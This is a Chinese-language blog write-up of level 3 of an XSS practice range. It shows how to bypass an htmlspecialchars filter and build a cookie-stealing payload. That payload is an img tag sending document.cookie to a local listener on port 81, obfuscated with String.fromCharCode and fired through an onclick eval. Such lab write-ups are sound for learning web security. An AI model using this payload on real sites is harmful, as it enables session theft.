前言
一個朋友突然問我xss闖關第三關如何反彈cookie。自己研究了一下确實不是太簡單。記個筆記在此。
有網上線上的xss闖關。也可以去下載下傳一下
第三關
xss在出現在keyword參數上。用的是單引号閉合的。
看源碼可以看到用什麼閉合的。但是你f12看的時候是雙引号,實際是單引号。是以我覺得這裡還是要猜一下。也好猜。不是單引号就是雙引号了。
看下圖。
1、這個靶場似乎沒有cookie。我自己添加了一個ccookie。
2、用了
htmlspecialchars
進行了xss過濾
3、用單引号閉合
基本就是繞過
htmlspecialchars
這個函數了。過濾了雙引号,沒過濾單引号。
雖然這樣,但是,單引号被用作onclick的包含。
keyword=' onclick='alert(123)'
是以決定不用單引号了
構造好payload。應該都能看懂。給本地的81端口彈cookie。
document.write('<img src="http://127.0.0.1/?cmd='+document.cookie+'" />');
然後我将每個字元變為ascii碼。使用
charCodeAt
函數。如下
var a = "document.write('<img src=\"http://127.0.0.1:81?cmd='+document.cookie+'\" />');";
var b = ''
for(var i=0;i<a.length;i++){
b+= a[i].charCodeAt()+' '
}
console.log(b)
成功的得到了所有字元的ascii碼。
然後我再用
String.fromCharCode
将ascii碼轉回字元。腳本如下
a = "100 111 99 117 109 101 110 116 46 119 114 105 116 101 40 39 60 105 109 103 32 115 114 99 61 34 104 116 116 112 58 47 47 49 50 55 46 48 46 48 46 49 58 56 49 63 99 109 100 61 39 43 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 43 39 34 32 47 62 39 41 59"
b = a.split(" ")
var c = ''
for(var i=0;i<b.length;i++){
c += "+String.fromCharCode("+b[i]+")"
}
console.log(c)
記得去掉第一個的
+
這樣就實作了沒有單引号了。然後我們用js的eval函數執行js代碼即可。
但是注意的是url中+會被解碼為空格。是以還需要進行一次url編碼,
+
被編碼為
%2b
。
編碼好之後,就得到了最終的payload
keyword=' οnclick='javascript:eval(String.fromCharCode(100)%2bString.fromCharCode(111)%2bString.fromCharCode(99)%2bString.fromCharCode(117)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(110)%2bString.fromCharCode(116)%2bString.fromCharCode(46)%2bString.fromCharCode(119)%2bString.fromCharCode(114)%2bString.fromCharCode(105)%2bString.fromCharCode(116)%2bString.fromCharCode(101)%2bString.fromCharCode(40)%2bString.fromCharCode(39)%2bString.fromCharCode(60)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(103)%2bString.fromCharCode(32)%2bString.fromCharCode(115)%2bString.fromCharCode(114)%2bString.fromCharCode(99)%2bString.fromCharCode(61)%2bString.fromCharCode(34)%2bString.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(49)%2bString.fromCharCode(50)%2bString.fromCharCode(55)%2bString.fromCharCode(46)%2bString.fromCharCode(48)%2bString.fromCharCode(46)%2bString.fromCharCode(48)%2bString.fromCharCode(46)%2bString.fromCharCode(49)%2bString.fromCharCode(58)%2bString.fromCharCode(56)%2bString.fromCharCode(49)%2bString.fromCharCode(63)%2bString.fromCharCode(99)%2bString.fromCharCode(109)%2bString.fromCharCode(100)%2bString.fromCharCode(61)%2bString.fromCharCode(39)%2bString.fromCharCode(43)%2bString.fromCharCode(100)%2bString.fromCharCode(111)%2bString.fromCharCode(99)%2bString.fromCharCode(117)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(110)%2bString.fromCharCode(116)%2bString.fromCharCode(46)%2bString.fromCharCode(99)%2bString.fromCharCode(111)%2bString.fromCharCode(111)%2bString.fromCharCode(107)%2bString.fromCharCode(105)%2bString.fromCharCode(101)%2bString.fromCharCode(43)%2bString.fromCharCode(39)%2bString.fromCharCode(34)%2bString.fromCharCode(32)%2bString.fromCharCode(47)%2bString.fromCharCode(62)%2bString.fromCharCode(39)%2bString.fromCharCode(41)%2bString.fromCharCode(59))'
其中用了
js僞協定
本地監聽81端口
然後送出參數keyword。
然後點選輸入框,觸發onclick。成功得到cookie